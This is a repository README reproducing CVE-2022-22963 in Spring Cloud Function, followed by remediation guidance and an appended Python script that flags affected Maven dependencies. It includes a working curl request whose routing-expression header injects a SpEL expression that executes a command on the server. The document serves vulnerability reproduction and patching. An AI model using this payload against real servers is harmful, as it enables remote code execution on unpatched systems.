# spring-cloud-function-rce-CVE-2022-22963
**Repository Path**: luoex/spring-cloud-function-rce-CVE-2022-22963
## Basic Information
- **Project Name**: spring-cloud-function-rce-CVE-2022-22963
- **Description**: Spring Cloud Function SpEL injection vulnerability
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No
## Statistics
- **Stars**: 2
- **Forks**: 0
- **Created**: 2022-03-31
- **Last Updated**: 2022-12-07
## Categories & Tags
**Categories**: Uncategorized
**Tags**: None
## README
This example corresponds to CVE-2022-22963: Spring Expression Resource Access Vulnerability. Reference links:
- [https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function](https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function)
- [https://tanzu.vmware.com/security/cve-2022-22963](https://tanzu.vmware.com/security/cve-2022-22963)
## Reproduction
**Expected result:**
After the injected request is processed, a command is executed on the server (in this example, the Windows calculator is launched).

**Method 1: run the test case directly**
[ScfApplicationTests.java -> testScfRce](src/test/java/com/example/demo/ScfApplicationTests.java)
**Method 2: send the equivalent request**
First start this application, then reproduce the request with the following command:
```bash
curl "http://localhost:8080/functionRouter" \
  -X "POST" -H "Content-Type: application/x-www-form-urlencoded" \
  -H "spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec('calc')" \
  -v
```
## Root cause
The application depends on Spring Cloud Function (for example spring-cloud-function-context, spring-cloud-function-web or spring-cloud-function-webflux).
Affected versions: Spring Cloud Function (3 <= version <= 3.2.2)
> Note:
> This vulnerability only applies to applications that depend on Spring Cloud Function; applications that do not depend on those modules are not affected.
## Remediation
Spring published fixed versions of Spring Cloud Function on 2022-03-29:
- 3.1.x must be upgraded to 3.1.7
- 3.2.x must be upgraded to 3.2.3
For this example, the relevant Maven dependencies are adjusted as follows:
```xml
<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-function-web</artifactId>
    <version>3.2.3</version>
</dependency>
<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-function-context</artifactId>
    <version>3.2.3</version>
</dependency>
<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-function-core</artifactId>
    <version>3.2.3</version>
</dependency>
```
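The affected-version range from the root-cause section and the fixed versions from the remediation section can be turned into a dependency check. The script below is an added example, not part of this repository: it scans a Maven POM for `org.springframework.cloud:spring-cloud-function-*` dependencies, flags versions inside 3.0.0..3.2.2, and names the fixed version per line. The sample POM and the `${scf.version}` property are constructed for the demo; the 3.0.x-to-3.2.3 mapping is an assumption, since the advisory text above lists no separate 3.0.x fix.

```python
# Flag Spring Cloud Function deps in a Maven POM within the CVE-2022-22963 range (3.0.0..3.2.2).
import re
import xml.etree.ElementTree as ET
AFFECTED_MIN, AFFECTED_MAX = (3, 0, 0), (3, 2, 2)
FIXED = {(3, 1): "3.1.7", (3, 2): "3.2.3"}  # fixed version per release line, from the advisory
_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)")

def parse_version(text):
    """(major, minor, patch), or None for unresolvable values such as ${scf.version}."""
    m = _VER.match(text.strip())
    return tuple(int(x) for x in m.groups()) if m else None

def is_affected(version):
    v = parse_version(version)
    return v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX

def fixed_version_for(version):
    # Assumption: the advisory names no 3.0.x fix line, so 3.0.x is pointed at 3.2.3.
    return FIXED.get(parse_version(version)[:2], "3.2.3")

def _child_text(elem, name):
    for child in elem:  # namespace-agnostic: a pom may or may not declare xmlns
        if child.tag.rsplit("}", 1)[-1] == name:
            return (child.text or "").strip()
    return None

def scan_pom(pom_xml):
    """One finding dict per spring-cloud-function-* dependency in the POM."""
    findings = []
    for dep in ET.fromstring(pom_xml).iter():
        if dep.tag.rsplit("}", 1)[-1] != "dependency":
            continue
        artifact = _child_text(dep, "artifactId") or ""
        group = _child_text(dep, "groupId")
        if group != "org.springframework.cloud" or not artifact.startswith("spring-cloud-function"):
            continue
        version = _child_text(dep, "version")
        if version is None or parse_version(version) is None:
            status = "unresolved: check the effective POM"  # BOM-managed or property-driven
        elif is_affected(version):
            status = "affected: upgrade to " + fixed_version_for(version)
        else:
            status = "ok"
        findings.append({"artifact": artifact, "version": version, "status": status})
    return findings

# Constructed sample POM, not the repository's real pom.xml.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0"><dependencies>
<dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-function-web</artifactId><version>3.2.2</version></dependency>
<dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-function-context</artifactId><version>3.1.5</version></dependency>
<dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-function-core</artifactId><version>${scf.version}</version></dependency>
</dependencies></project>"""
```

Versions managed by a BOM or a property are reported as unresolved rather than silently passed, so run the check against the effective POM (`mvn help:effective-pom`) when that appears.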